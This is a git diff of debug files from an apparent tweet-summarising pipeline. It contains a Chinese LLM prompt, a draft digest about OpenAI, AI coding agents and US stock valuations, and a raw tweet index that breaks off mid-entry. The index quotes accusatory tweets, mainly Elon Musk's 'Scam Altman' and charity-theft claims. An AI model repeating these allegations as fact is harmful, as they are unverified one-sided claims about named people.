Graham淡化AI焦虑\",\"Marc Andreessen谈资源稀缺性\"]},{\"id\":\"c6\",\"title\":\"华语圈\",\"subtitle\":\"待采集\",\"level\":\"P2\",\"item_urls\":[],\"item_texts\":[\"中文账号需X API获取,暂无可用数据\"]}],\"risk_signals\":[{\"id\":\"r1\",\"level\":\"HIGH\",\"title\":\"美股估值极端化\",\"detail\":\"CAPE比率41创25年新高,超过99%历史水平,但美联储仍在QE,市场过于乐观\"},{\"id\":\"r2\",\"level\":\"MID\",\"title\":\"AI代理安全隐患\",\"detail\":\"GaryMarcus指出vibe-coded AI代理频繁造成数据丢失,用户缺乏必要的技术经验\"},{\"id\":\"r3\",\"level\":\"OPP\",\"title\":\"AI编程效率提升显著\",\"detail\":\"研究人员可让GPT-5.5独立运行实验vernight,构建效率大幅提升,验证了Andrew Ng的观点\"}]}", + "parsed_draft": { + "themes": [ + { + "id": "t1", + "title": "Sam Altman:重新思考操作系统和UI设计", + "subtitle": " Altman暗示AI将改变人机交互范式", + "bullets": [ + "微软仍是主要云伙伴,但OpenAI产品将可在所有云上使用", + "认为现在是认真重新思考操作系统和用户界面设计的好时机", + "提出应有一个人类和AI代理都能使用的协议" + ], + "sample_urls": [ + "https://x.com/sama/status/2048428561481265539", + "https://x.com/sama/status/2048755148361707946" + ] + }, + { + "id": "t2", + "title": "AI-native工程团队的工作方式演进", + "subtitle": "Andrew Ng深度分析AI编程带来的变化", + "bullets": [ + "AI-native团队使用编码代理构建产品速度更快", + "不仅改变开发速度,还改变了团队运营方式", + "高质量工程师角色转变为更多监督和审查" + ], + "sample_urls": [ + "https://x.com/AndrewYNg/status/2048793852702757151" + ] + }, + { + "id": "t3", + "title": "宏观叙事:美股估值与央行政策", + "subtitle": "Charlie Bilello警示市场信号", + "bullets": [ + "S&P 500的CAPE比率升至41,创2000年以来最高,超过99%历史估值", + "美联储扩张资产负债表(QE),但市场仍创新高", + "2026年跟随2025剧本,交易员对极端言论免疫,更自信抄底" + ], + "sample_urls": [ + "https://x.com/charliebilello/status/2048753179471323584", + "https://x.com/charliebilello/status/2048761760971096534" + ] + } + ], + "p0_events": [ + { + "id": "p01", + "title": "OpenAI与微软更新合作", + "meta": "2026-04-27 | @sama", + "summary": "微软仍为主要云伙伴,OpenAI产品可跨所有云使用,合作延续至2032年", + "url": "https://x.com/sama/status/2048755148361707946" + }, + { + "id": "p02", + "title": "AI-native软件工程团队运作差异", + "meta": "2026-04-27 | @AndrewYNg", + "summary": "AI团队使用编码代理构建产品更快,运营方式发生根本变化", + "url": "https://x.com/AndrewYNg/status/2048793852702757151" + }, + { + "id": "p03", + "title": "S&P 500 CAPE比率创2000年来新高", + "meta": "2026-04-27 | @charliebilello", + "summary": "估值达41,超过99%历史水平,央行QE持续但市场无视风险", + "url": "https://x.com/charliebilello/status/2048753179471323584" + }, + { + "id": "p04", + "title": "GPT-5.5成为Perplexity默认编排模型", + "meta": "2026-04-24 | @AravSrinivas", + "summary": "用户消耗更少算力 credits,可运行更多任务", + "url": "https://x.com/AravSrinivas/status/2047788775468908840" + }, + { + "id": "p05", + "title": "Paul Graham:初创公司不必担心被模型公司吞噬", + "meta": "2026-04-27 | @paulg", + "summary": "担心被模型公司吃掉就像担心成为明星后生活受限", + "url": "https://x.com/paulg/status/2048677984106664227" + }, + { + "id": "p06", + "title": "Marc Andreessen:软件即提示", + "meta": "2026-04-27 | @pmarca", + "summary": "软件只是下一个版本软件的提示", + "url": "https://x.com/pmarca/status/2048573035616375134" + } + ], + "top_quotes": [ + { + "id": "q1", + "quote": "feels like a good time to seriously rethink how operating systems and user interfaces are designed", + "speaker": "Sam Altman", + "date": "2026-04-26", + "note": "暗示AI将重塑人机交互范式", + "url": "https://x.com/sama/status/2048428561481265539" + }, + { + "id": "q2", + "quote": "When one thing becomes abundant and cheap, another thing becomes scarce and valuable.", + "speaker": "Marc Andreessen", + "date": "2026-04-27", + "note": "一句话道出AI时代的价值转移逻辑", + "url": "https://x.com/pmarca/status/2048624098398650608" + }, + { + "id": "q3", + "quote": "Worrying that your startup will be eaten by the model companies is like worrying that your life will be constrained after you become a movie star. You're far more likely simply to fail.", + "speaker": "Paul Graham", + "date": "2026-04-27", + "note": "对AI焦虑的经典回应", + "url": "https://x.com/paulg/status/2048677984106664227" + } + ], + "category_updates": [ + { + "id": "c1", + "title": "AI模型进展", + "subtitle": "行业持续快速迭代", + "level": "P0", + "item_urls": [ + "https://x.com/sama/status/2048554097985593849", + "https://x.com/AravSrinivas/status/2047753276888854595" + ], + "item_texts": [ + "GPT-5.5发布反响热烈", + "Perplexity默认模型切换至GPT-5.5" + ] + }, + { + "id": "c2", + "title": "AI编程工具", + "subtitle": "编码代理实战表现", + "level": "P0", + "item_urls": [ + "https://x.com/sama/status/2048165186482389253", + "https://x.com/sama/status/2047386955550470245" + ], + "item_texts": [ + "Codex在企业内部部署效果显著", + "研究人员让GPT-5.5独立运行实验" + ] + }, + { + "id": "c3", + "title": "宏观市场", + "subtitle": "美股风险信号积累", + "level": "P1", + "item_urls": [ + "https://x.com/charliebilello/status/2048753179471323584", + "https://x.com/charliebilello/status/2048406550897729561" + ], + "item_texts": [ + "CAPE估值创25年新高", + "通胀持续高于美联储目标61个月" + ] + }, + { + "id": "c4", + "title": "AI安全与批评", + "subtitle": "GaryMarcus持续警示", + "level": "P2", + "item_urls": [ + "https://x.com/GaryMarcus/status/2048757233174122827", + "https://x.com/GaryMarcus/status/2048593283639894520" + ], + "item_texts": [ + "AI代理是过早技术,推广太快", + "vibe coding一代不懂备份" + ] + }, + { + "id": "c5", + "title": "VC视角", + "subtitle": "行业方向判断", + "level": "P1", + "item_urls": [ + "https://x.com/paulg/status/2048677984106664227", + "https://x.com/pmarca/status/2048624098398650608" + ], + "item_texts": [ + "Paul Graham淡化AI焦虑", + "Marc Andreessen谈资源稀缺性" + ] + }, + { + "id": "c6", + "title": "华语圈", + "subtitle": "待采集", + "level": "P2", + "item_urls": [], + "item_texts": [ + "中文账号需X API获取,暂无可用数据" + ] + } + ], + "risk_signals": [ + { + "id": "r1", + "level": "HIGH", + "title": "美股估值极端化", + "detail": "CAPE比率41创25年新高,超过99%历史水平,但美联储仍在QE,市场过于乐观" + }, + { + "id": "r2", + "level": "MID", + "title": "AI代理安全隐患", + "detail": "GaryMarcus指出vibe-coded AI代理频繁造成数据丢失,用户缺乏必要的技术经验" + }, + { + "id": "r3", + "level": "OPP", + "title": "AI编程效率提升显著", + "detail": "研究人员可让GPT-5.5独立运行实验vernight,构建效率大幅提升,验证了Andrew Ng的观点" + } + ] + } +} \ No newline at end of file diff --git a/data/x_brief/debug/20260428_011513_l1_stage2_input.txt b/data/x_brief/debug/20260428_011513_l1_stage2_input.txt new file mode 100644 index 0000000..8856fb4 --- /dev/null +++ b/data/x_brief/debug/20260428_011513_l1_stage2_input.txt @@ -0,0 +1,31 @@ +[meta] + +phase=stage2_finalize + +tweets=120 + + + +[prompt] + +你是“X资讯月报总编”。请基于阶段1草案,输出最终可渲染 JSON(阶段2定稿)。 + +要求: +1) 只输出 JSON 对象,不要 markdown,不要解释文字。 +2) 必须严格使用最终字段: +{ + "themes":[{"id":"t1","title":"...","subtitle":"...","bullets":["..."],"samples":[{"text":"...","url":"...","handle":"...","date":"..."}]}], + "p0_events":[{"id":"p01","title":"...","meta":"...","summary":"...","url":"..."}], + "top_quotes":[{"id":"q1","quote":"...","speaker":"...","date":"...","note":"...","url":"..."}], + "category_updates":[{"id":"c1","title":"...","subtitle":"...","level":"P0|P1|P2|WARN","items":[{"text":"...","url":"..."}]}], + "risk_signals":[{"id":"r1","level":"HIGH|MID|OPP","title":"...","detail":"..."}] +} +3) 保证 JSON 合法(双引号、无尾逗号)。 +4) 引用 URL 时,优先从“推文索引”中取值;samples/items 尽量带 url。 +5) 数量限制:themes=3, p0_events<=6, top_quotes<=3, category_updates<=6, risk_signals<=6。 + +阶段1草案(JSON): +{"themes": [{"id": "t1", "title": "Sam Altman:重新思考操作系统和UI设计", "subtitle": " Altman暗示AI将改变人机交互范式", "bullets": ["微软仍是主要云伙伴,但OpenAI产品将可在所有云上使用", "认为现在是认真重新思考操作系统和用户界面设计的好时机", "提出应有一个人类和AI代理都能使用的协议"], "sample_urls": ["https://x.com/sama/status/2048428561481265539", "https://x.com/sama/status/2048755148361707946"]}, {"id": "t2", "title": "AI-native工程团队的工作方式演进", "subtitle": "Andrew Ng深度分析AI编程带来的变化", "bullets": ["AI-native团队使用编码代理构建产品速度更快", "不仅改变开发速度,还改变了团队运营方式", "高质量工程师角色转变为更多监督和审查"], "sample_urls": ["https://x.com/AndrewYNg/status/2048793852702757151"]}, {"id": "t3", "title": "宏观叙事:美股估值与央行政策", "subtitle": "Charlie Bilello警示市场信号", "bullets": ["S&P 500的CAPE比率升至41,创2000年以来最高,超过99%历史估值", "美联储扩张资产负债表(QE),但市场仍创新高", "2026年跟随2025剧本,交易员对极端言论免疫,更自信抄底"], "sample_urls": ["https://x.com/charliebilello/status/2048753179471323584", "https://x.com/charliebilello/status/2048761760971096534"]}], "p0_events": [{"id": "p01", "title": "OpenAI与微软更新合作", "meta": "2026-04-27 | @sama", "summary": "微软仍为主要云伙伴,OpenAI产品可跨所有云使用,合作延续至2032年", "url": "https://x.com/sama/status/2048755148361707946"}, {"id": "p02", "title": "AI-native软件工程团队运作差异", "meta": "2026-04-27 | @AndrewYNg", "summary": "AI团队使用编码代理构建产品更快,运营方式发生根本变化", "url": "https://x.com/AndrewYNg/status/2048793852702757151"}, {"id": "p03", "title": "S&P 500 CAPE比率创2000年来新高", "meta": "2026-04-27 | @charliebilello", "summary": "估值达41,超过99%历史水平,央行QE持续但市场无视风险", "url": "https://x.com/charliebilello/status/2048753179471323584"}, {"id": "p04", "title": "GPT-5.5成为Perplexity默认编排模型", "meta": "2026-04-24 | @AravSrinivas", "summary": "用户消耗更少算力 credits,可运行更多任务", "url": "https://x.com/AravSrinivas/status/2047788775468908840"}, {"id": "p05", "title": "Paul Graham:初创公司不必担心被模型公司吞噬", "meta": "2026-04-27 | @paulg", "summary": "担心被模型公司吃掉就像担心成为明星后生活受限", "url": "https://x.com/paulg/status/2048677984106664227"}, {"id": "p06", "title": "Marc Andreessen:软件即提示", "meta": "2026-04-27 | @pmarca", "summary": "软件只是下一个版本软件的提示", "url": "https://x.com/pmarca/status/2048573035616375134"}], "top_quotes": [{"id": "q1", "quote": "feels like a good time to seriously rethink how operating systems and user interfaces are designed", "speaker": "Sam Altman", "date": "2026-04-26", "note": "暗示AI将重塑人机交互范式", "url": "https://x.com/sama/status/2048428561481265539"}, {"id": "q2", "quote": "When one thing becomes abundant and cheap, another thing becomes scarce and valuable.", "speaker": "Marc Andreessen", "date": "2026-04-27", "note": "一句话道出AI时代的价值转移逻辑", "url": "https://x.com/pmarca/status/2048624098398650608"}, {"id": "q3", "quote": "Worrying that your startup will be eaten by the model companies is like worrying that your life will be constrained after you become a movie star. You're far more likely simply to fail.", "speaker": "Paul Graham", "date": "2026-04-27", "note": "对AI焦虑的经典回应", "url": "https://x.com/paulg/status/2048677984106664227"}], "category_updates": [{"id": "c1", "title": "AI模型进展", "subtitle": "行业持续快速迭代", "level": "P0", "item_urls": ["https://x.com/sama/status/2048554097985593849", "https://x.com/AravSrinivas/status/2047753276888854595"], "item_texts": ["GPT-5.5发布反响热烈", "Perplexity默认模型切换至GPT-5.5"]}, {"id": "c2", "title": "AI编程工具", "subtitle": "编码代理实战表现", "level": "P0", "item_urls": ["https://x.com/sama/status/2048165186482389253", "https://x.com/sama/status/2047386955550470245"], "item_texts": ["Codex在企业内部部署效果显著", "研究人员让GPT-5.5独立运行实验"]}, {"id": "c3", "title": "宏观市场", "subtitle": "美股风险信号积累", "level": "P1", "item_urls": ["https://x.com/charliebilello/status/2048753179471323584", "https://x.com/charliebilello/status/2048406550897729561"], "item_texts": ["CAPE估值创25年新高", "通胀持续高于美联储目标61个月"]}, {"id": "c4", "title": "AI安全与批评", "subtitle": "GaryMarcus持续警示", "level": "P2", "item_urls": ["https://x.com/GaryMarcus/status/2048757233174122827", "https://x.com/GaryMarcus/status/2048593283639894520"], "item_texts": ["AI代理是过早技术,推广太快", "vibe coding一代不懂备份"]}, {"id": "c5", "title": "VC视角", "subtitle": "行业方向判断", "level": "P1", "item_urls": ["https://x.com/paulg/status/2048677984106664227", "https://x.com/pmarca/status/2048624098398650608"], "item_texts": ["Paul Graham淡化AI焦虑", "Marc Andreessen谈资源稀缺性"]}, {"id": "c6", "title": "华语圈", "subtitle": "待采集", "level": "P2", "item_urls": [], "item_texts": ["中文账号需X API获取,暂无可用数据"]}], "risk_signals": [{"id": "r1", "level": "HIGH", "title": "美股估值极端化", "detail": "CAPE比率41创25年新高,超过99%历史水平,但美联储仍在QE,市场过于乐观"}, {"id": "r2", "level": "MID", "title": "AI代理安全隐患", "detail": "GaryMarcus指出vibe-coded AI代理频繁造成数据丢失,用户缺乏必要的技术经验"}, {"id": "r3", "level": "OPP", "title": "AI编程效率提升显著", "detail": "研究人员可让GPT-5.5独立运行实验vernight,构建效率大幅提升,验证了Andrew Ng的观点"}]} + +推文索引(按 url 可回填 handle/date/text): +[{"handle": "elonmusk", "name": "Elon Musk", "published_at": "2026-04-27T16:54:21+00:00", "title": "Calling him “Scam” Altman is accurate. \n\nThis is very much worth reading.", "url": "https://x.com/elonmusk/status/2048807976991850953"}, {"handle": "elonmusk", "name": "Elon Musk", "published_at": "2026-04-27T16:39:59+00:00", "title": "RT by @elonmusk: Sam Altman cannot be trusted.\n\n• The OpenAI board fired him because he was not always honest with them. They said he should not control powerful AI.\n\n• A major report talked to over 100 people and saw secret papers. It says he has almost a sociopathic lack of con", "url": "https://x.com/elonmusk/status/2048804363595059425"}, {"handle": "elonmusk", "name": "Elon Musk", "published_at": "2026-04-27T16:31:33+00:00", "title": "Exactly", "url": "https://x.com/elonmusk/status/2048802239272169582"}, {"handle": "elonmusk", "name": "Elon Musk", "published_at": "2026-04-27T16:30:27+00:00", "title": "Pinned: Scam Altman and Greg Stockman stole a charity. Full stop. \n\nGreg got tens of billions of stock for himself and Scam got dozens of OpenAI side deals with a piece of the action for himself, Y Combinator style. After this lawsuit, Scam will also be awarded tens of billions i", "url": "https://x.com/elonmusk/status/2048801964457140540"}, {"handle": "elonmusk", "name": "Elon Musk", "published_at": "2026-04-27T16:21:30+00:00", "title": "Scam Altman", "url": "https://x.com/elonmusk/status/2048799712375902624"}, {"handle": "charliebilello", "name": "Charlie Bilello", "published_at": "2026-04-27T16:21:01+00:00", "title": "Americans spent over $109 billion on lottery tickets last year, which is more than they spent on movies, books, concerts and sports tickets - combined.", "url": "https://x.com/charliebilello/status/2048799590044852390"}, {"handle": "jason", "name": "Jason Calacanis", "published_at": "2026-04-27T16:13:00+00:00", "title": "Imagine when you can take these on Uber (or own one), what it will do to real estate values?!? 🤯 \n\nFrom hill country ranches to Austin in ten minutes?! \n\nIf you could buy one for $2m, or lease for $5k a month, and commute into a city from the burbs?!? Wild. https://x.com/shaig/st", "url": "https://x.com/jason/status/2048797572014207114"}, {"handle": "jason", "name": "Jason Calacanis", "published_at": "2026-04-27T16:10:40+00:00", "title": "10 minutes from manhattan to jfk is a game changer… \n\n… but the 5 minutes from my loft in Chelsea to Breezy Point in 7 minutes during the 90s would have been insane! \n\nImagine when you can take these on Uber (or own one), what it will do to real estate values?!? 🤯 https://x.com/", "url": "https://x.com/jason/status/2048796982227972344"}, {"handle": "AndrewYNg", "name": "Andrew Ng", "published_at": "2026-04-27T15:58:13+00:00", "title": "AI-native software engineering teams operate very differently than traditional teams. The obvious difference is that AI-native teams use coding agents to build products much faster, but this leads to many other changes in how we operate. For example, some great engineers now play", "url": "https://x.com/AndrewYNg/status/2048793852702757151"}, {"handle": "elonmusk", "name": "Elon Musk", "published_at": "2026-04-27T15:56:52+00:00", "title": "RT by @elonmusk: From space to your phone, Starlink Mobile is now available to deliver data, voice, video, and messaging to @docomo customers in Japan 🛰️❤️📱", "url": "https://x.com/elonmusk/status/2048793511701717143"}, {"handle": "jason", "name": "Jason Calacanis", "published_at": "2026-04-27T15:56:20+00:00", "title": "RT by @Jason: update! the @twistartups AI sidebar is going well\n\nThe goal: a live AI sidebar with 4 personas watching the pod in real time\n\nProgress update: \n✅ Side bar (Chrome extension works with any website)\n✅ Two characters: comedian fox + troll alien\n✅ Ability to adjust freq", "url": "https://x.com/jason/status/2048793378511536538"}, {"handle": "GaryMarcus", "name": "Gary Marcus", "published_at": "2026-04-27T15:50:31+00:00", "title": "If a major car company had AI fan boys and released a car with loose lug nuts and the wheels came off, after hyping it as the greatest thing ever, and a bunch of people died, those fan boys would say “y’all shoulda known”.", "url": "https://x.com/GaryMarcus/status/2048791912149295182"}, {"handle": "GaryMarcus", "name": "Gary Marcus", "published_at": "2026-04-27T15:33:34+00:00", "title": "R to @GaryMarcus: that said, another tweet by the same user does correctly assess what’s wrong with most user’s model of what LLMs say.", "url": "https://x.com/GaryMarcus/status/2048787646206677207"}, {"handle": "GaryMarcus", "name": "Gary Marcus", "published_at": "2026-04-27T15:31:37+00:00", "title": "This is totally wrong.\n\nBlaming the user is missing the point that (a) coding agents have been overhyped and (b) can’t reliably obey the rules given to them in system prompts and other guardrails.", "url": "https://x.com/GaryMarcus/status/2048787157536653627"}, {"handle": "elonmusk", "name": "Elon Musk", "published_at": "2026-04-27T15:26:33+00:00", "title": "RT by @elonmusk: .@shaunmmaguire says Elon Musk’s X acquisition was in service of civilizational-scale missions.\n\n\"I truly believe, like in my soul, that he is trying to help humanity.\"\n\n\"He has these goals. Like back up the biosphere by making us a multi-planetary species or ush", "url": "https://x.com/elonmusk/status/2048785882950549854"}, {"handle": "elonmusk", "name": "Elon Musk", "published_at": "2026-04-27T15:15:09+00:00", "title": "If extremely violent criminals are not imprisoned, eventually they will murder innocent people", "url": "https://x.com/elonmusk/status/2048783014075777369"}, {"handle": "jason", "name": "Jason Calacanis", "published_at": "2026-04-27T15:03:32+00:00", "title": "Best accounts for following Austin air quality? @grok", "url": "https://x.com/jason/status/2048780089295302690"}, {"handle": "elonmusk", "name": "Elon Musk", "published_at": "2026-04-27T14:53:45+00:00", "title": "Excellent point", "url": "https://x.com/elonmusk/status/2048777628019032335"}, {"handle": "GaryMarcus", "name": "Gary Marcus", "published_at": "2026-04-27T14:27:36+00:00", "title": "yep, that’s what I do. \n\nI am increasingly concerned that people in China are soaking up my wisdom, while a lot of people in the US try to dismiss me.\n\ni don’t think that is going to end well.", "url": "https://x.com/GaryMarcus/status/2048771044987777428"}, {"handle": "HarryStebbings", "name": "Harry Stebbings", "published_at": "2026-04-27T14:02:33+00:00", "title": "R to @HarryStebbings: Spotify https://open.spotify.com/episode/5KPihKzCMKY2DnPeuSxXZ5\nApple Podcasts https://podcasts.apple.com/us/podcast/20vc-applovin-%24160bn-market-cap-%245-48bn-revenue-%2410m/id958230465?i=1000763769440\nYoutube https://youtu.be/dlPCz8Jwypw", "url": "https://x.com/HarryStebbings/status/2048764743205134644"}, {"handle": "HarryStebbings", "name": "Harry Stebbings", "published_at": "2026-04-27T14:02:33+00:00", "title": "Adam Foroughi is by far one of the best CEOs I have ever interviewed.\n\nCandidly he is insanely stern and cold but also obsessive, focused and utterly brilliant.\n\nWith Adam there is zero fluff, like none. He says what he means and means what he says.\n\nApplovin does $10M EBITDA per", "url": "https://x.com/HarryStebbings/status/2048764741435179442"}, {"handle": "charliebilello", "name": "Charlie Bilello", "published_at": "2026-04-27T13:50:42+00:00", "title": "2026 is following the same playbook as 2025. Only difference is traders have become much more immune to extreme rhetoric and have been more confident in buying the dip, sending the stock market quickly back to new all-time highs. $SPX\n\nVideo: https://www.youtube.com/watch?v=p5e0T", "url": "https://x.com/charliebilello/status/2048761760971096534"}, {"handle": "JeffDean", "name": "Jeff Dean", "published_at": "2026-04-27T13:40:08+00:00", "title": "The video of my conversation with Amin Vahdat, @gilbert, and @djrosent at Cloud Next last week is now up. \n\nhttps://youtu.be/BpnJYJmbXcM?si=vUY3hI_aDX8K6gco\n\nThanks for a great conversation!", "url": "https://x.com/JeffDean/status/2048759102390899142"}, {"handle": "GaryMarcus", "name": "Gary Marcus", "published_at": "2026-04-27T13:32:43+00:00", "title": "⚠️ AI agents are wildly premature technology that is being rolled out way too fast. The deepest lesson about the vibe coded AI agent disaster story that is running around is NOT about losing your data. ⚠️\n\n𝗜𝘁’𝘀 𝗮𝗯𝗼𝘂𝘁 𝗔𝗜 𝘀𝗮𝗳𝗲𝘁𝘆. \n\nThe user wasn’t (totally) naive. He thought system", "url": "https://x.com/GaryMarcus/status/2048757233174122827"}, {"handle": "HarryStebbings", "name": "Harry Stebbings", "published_at": "2026-04-27T13:30:16+00:00", "title": "Two areas I would love to invest that are non-technical: \n\n1. Egg freezing clinics. In 10 years, strongly believe every 21 year old will freeze their eggs and it becomes the norm. \n\nAmazing business. Insane retention numbers. Super high margin. \n\n2. AI re-skilling facilities. Go ", "url": "https://x.com/HarryStebbings/status/2048756619622707452"}, {"handle": "soumithchintala", "name": "Soumith Chintala", "published_at": "2026-04-27T13:29:14+00:00", "title": "This is kinda interesting.\n\nAnthro probably needs to scale up Account Support via Claude or via humans (traditional account managers). Would be funny if they chose humans.\n\nAlternatively, more and more companies can probably go multi-AI with open harnesses. \n\nSimilar problems to ", "url": "https://x.com/soumithchintala/status/2048756358820827564"}, {"handle": "sama", "name": "Sam Altman", "published_at": "2026-04-27T13:24:26+00:00", "title": "we have updated our partnership with microsoft.\n\nmicrosoft will remain our primary cloud partner, but we are now able to make our products and services available across all clouds.\n\nwill continue to provide them with models and products until 2032, and a revenue share through 203", "url": "https://x.com/sama/status/2048755148361707946"}, {"handle": "charliebilello", "name": "Charlie Bilello", "published_at": "2026-04-27T13:16:36+00:00", "title": "The S&P 500's CAPE Ratio has moved up to 41, its highest level since 2000 and now above 99% of historical valuations. $SPX\n\nVideo: https://www.youtube.com/watch?v=p5e0ThPjIAg&t=36s", "url": "https://x.com/charliebilello/status/2048753179471323584"}, {"handle": "sama", "name": "Sam Altman", "published_at": "2026-04-27T13:09:30+00:00", "title": "this is so good:\n\nhttps://paulgraham.com/kids.html", "url": "https://x.com/sama/status/2048751392031203544"}, {"handle": "charliebilello", "name": "Charlie Bilello", "published_at": "2026-04-27T13:08:19+00:00", "title": "With 28% of companies reported, S&P 500 1st quarter earnings are up 15% over the prior year, the 13th consecutive quarter of positive YoY growth. $SPX\n\nVideo: https://www.youtube.com/watch?v=p5e0ThPjIAg&t=973s", "url": "https://x.com/charliebilello/status/2048751094671585397"}, {"handle": "charliebilello", "name": "Charlie Bilello", "published_at": "2026-04-27T12:53:00+00:00", "title": "RT by @charliebilello: Wondering which month is the best time to start investing?\nThe right answer is any month. Just start!", "url": "https://x.com/charliebilello/status/2048747238986305979"}, {"handle": "elonmusk", "name": "Elon Musk", "published_at": "2026-04-27T12:50:55+00:00", "title": "RT by @elonmusk: Today marks the start of the Elon Musk v.Sam Altman trial.\n\nTwo opposing worldviews. \nSam Altman transformed a non-profit organization into one of the world's most profitable companies for his own enrichment.\n\n Elon Musk, who did everything he could to limit the", "url": "https://x.com/elonmusk/status/2048746715805581608"}, {"handle": "GaryMarcus", "name": "Gary Marcus", "published_at": "2026-04-27T12:48:41+00:00", "title": "R to @GaryMarcus: Stop blaming the users. It’s not that simple:", "url": "https://x.com/GaryMarcus/status/2048746152749846549"}, {"handle": "elonmusk", "name": "Elon Musk", "published_at": "2026-04-27T12:40:59+00:00", "title": "RT by @elonmusk: 🚨 NEWS: Emirates upgrades its iconic A380 with Starlink high-speed Wi-Fi, delivering “better-than-home” internet at 40,000 feet.\n\n• Up to 3 Starlink antennas on each A380 for massive speed boost\n\n• Internet performance improved up to 1000x vs older systems\n\n• Ena", "url": "https://x.com/elonmusk/status/2048744214230712500"}, {"handle": "GaryMarcus", "name": "Gary Marcus", "published_at": "2026-04-27T12:36:05+00:00", "title": "People keep blaming the users for the growing number of vibe-coded reasoners. Doing so is *half* right.\n\nUsers *are*screwing up - by letting vibe coded stuff access their files, without proper backups, without proper monitoring, without adequate sysadmin, etc.\n\nBut that’s *exactl", "url": "https://x.com/GaryMarcus/status/2048742983684784239"}, {"handle": "GaryMarcus", "name": "Gary Marcus", "published_at": "2026-04-27T12:20:17+00:00", "title": "“Vibe coded disasters piling up on Reddit”", "url": "https://x.com/GaryMarcus/status/2048739005525877072"}, {"handle": "elonmusk", "name": "Elon Musk", "published_at": "2026-04-27T11:35:33+00:00", "title": "RT by @elonmusk: This is the 7th consecutive week with new reporting that ChatGPT was used in connection with murder or suicide. \n\nOpenAI doesn’t “benefit all of humanity.”", "url": "https://x.com/elonmusk/status/2048727747954868342"}, {"handle": "elonmusk", "name": "Elon Musk", "published_at": "2026-04-27T11:08:22+00:00", "title": "RT by @elonmusk: They arrested the President of the United States of America 4X, charged him 91X, indicted him 4X, spied on his campaign, sabotaged his first term, jailed his supporters, raided his private residence, censored him, gagged him, tried to bankrupt him, and attempted ", "url": "https://x.com/elonmusk/status/2048720909809156378"}, {"handle": "paulg", "name": "Paul Graham", "published_at": "2026-04-27T10:01:28+00:00", "title": "One of my favorite pictures. A guy I didn't know took it of us on a street in Palo Alto about 10 years ago.", "url": "https://x.com/paulg/status/2048704073356935676"}, {"handle": "paulg", "name": "Paul Graham", "published_at": "2026-04-27T09:50:40+00:00", "title": "You never need to describe something as a \"bad take.\" If it's false or irrelevant or omits something important, you can just say so. And if it's true, relevant, and complete, it's not a bad take.", "url": "https://x.com/paulg/status/2048701354672050286"}, {"handle": "paulg", "name": "Paul Graham", "published_at": "2026-04-27T08:17:48+00:00", "title": "Worrying that your startup will be eaten by the model companies is like worrying that your life will be constrained after you become a movie star. You're far more likely simply to fail.", "url": "https://x.com/paulg/status/2048677984106664227"}, {"handle": "pmarca", "name": "Marc Andreessen", "published_at": "2026-04-27T08:14:21+00:00", "title": "😳", "url": "https://x.com/pmarca/status/2048677114480873657"}, {"handle": "pmarca", "name": "Marc Andreessen", "published_at": "2026-04-27T08:07:29+00:00", "title": "cc @BrendanEich", "url": "https://x.com/pmarca/status/2048675385119019444"}, {"handle": "pmarca", "name": "Marc Andreessen", "published_at": "2026-04-27T08:04:13+00:00", "title": "👀", "url": "https://x.com/pmarca/status/2048674564314685477"}, {"handle": "pmarca", "name": "Marc Andreessen", "published_at": "2026-04-27T08:01:44+00:00", "title": "But \"A Disservice To Those Who Are Watching\" is the name of this show!", "url": "https://x.com/pmarca/status/2048673940072251670"}, {"handle": "pmarca", "name": "Marc Andreessen", "published_at": "2026-04-27T07:59:56+00:00", "title": "cc @elonmusk", "url": "https://x.com/pmarca/status/2048673488383447437"}, {"handle": "pmarca", "name": "Marc Andreessen", "published_at": "2026-04-27T04:43:41+00:00", "title": "When one thing becomes abundant and cheap, another thing becomes scarce and valuable.", "url": "https://x.com/pmarca/status/2048624098398650608"}, {"handle": "pmarca", "name": "Marc Andreessen", "published_at": "2026-04-27T04:32:43+00:00", "title": "Overheard in Silicon Valley: \"Imagine if he heard how the world really worked. Wonder what manifesto would say then.\"", "url": "https://x.com/pmarca/status/2048621340408844368"}, {"handle": "pmarca", "name": "Marc Andreessen", "published_at": "2026-04-27T04:29:26+00:00", "title": "Image", "url": "https://x.com/pmarca/status/2048620511912194339"}, {"handle": "pmarca", "name": "Marc Andreessen", "published_at": "2026-04-27T04:10:44+00:00", "title": "The apps can rewrite the files. 👀", "url": "https://x.com/pmarca/status/2048615807190769738"}, {"handle": "paulg", "name": "Paul Graham", "published_at": "2026-04-27T04:08:42+00:00", "title": "RT by @paulg: Whenever I go to Paris to talk about investing in YC startups, I'm always amazed how much the French just LOVE Y Combinator. Nous t'aimons aussi, France.\n\nMy French friend of @Fundoraclub wanted to see YC from the inside...and share it with the people of France. T", "url": "https://x.com/paulg/status/2048615296613937201"}, {"handle": "pmarca", "name": "Marc Andreessen", "published_at": "2026-04-27T04:07:00+00:00", "title": "Many such cases.", "url": "https://x.com/pmarca/status/2048614869352714619"}, {"handle": "pmarca", "name": "Marc Andreessen", "published_at": "2026-04-27T04:06:10+00:00", "title": "🇺🇸", "url": "https://x.com/pmarca/status/2048614659595583651"}, {"handle": "pmarca", "name": "Marc Andreessen", "published_at": "2026-04-27T04:04:46+00:00", "title": "Many such cases (in the universe).", "url": "https://x.com/pmarca/status/2048614305705386433"}, {"handle": "pmarca", "name": "Marc Andreessen", "published_at": "2026-04-27T03:56:11+00:00", "title": "Concerning.", "url": "https://x.com/pmarca/status/2048612144871264609"}, {"handle": "pmarca", "name": "Marc Andreessen", "published_at": "2026-04-27T03:49:14+00:00", "title": "Self recommending!", "url": "https://x.com/pmarca/status/2048610397243265189"}, {"handle": "GaryMarcus", "name": "Gary Marcus", "published_at": "2026-04-27T03:39:49+00:00", "title": "RT by @GaryMarcus: The greatest con of the decade was calling autocomplete “AI”. \n\nThe second greatest is calling autocomplete-in-a-loop an “agent”.", "url": "https://x.com/GaryMarcus/status/2048608025464705084"}, {"handle": "elonmusk", "name": "Elon Musk", "published_at": "2026-04-27T03:11:45+00:00", "title": "Grok Imagine", "url": "https://x.com/elonmusk/status/2048600964102246438"}, {"handle": "pmarca", "name": "Marc Andreessen", "published_at": "2026-04-27T03:01:18+00:00", "title": "Self recommending recommending.", "url": "https://x.com/pmarca/status/2048598334492033455"}, {"handle": "pmarca", "name": "Marc Andreessen", "published_at": "2026-04-27T02:57:11+00:00", "title": "👀", "url": "https://x.com/pmarca/status/2048597298150875169"}, {"handle": "GaryMarcus", "name": "Gary Marcus", "published_at": "2026-04-27T02:41:14+00:00", "title": "“Always keep a separate backup.” For sure, every experienced programmer should know this.\n\n𝘉𝘶𝘵 𝘸𝘦 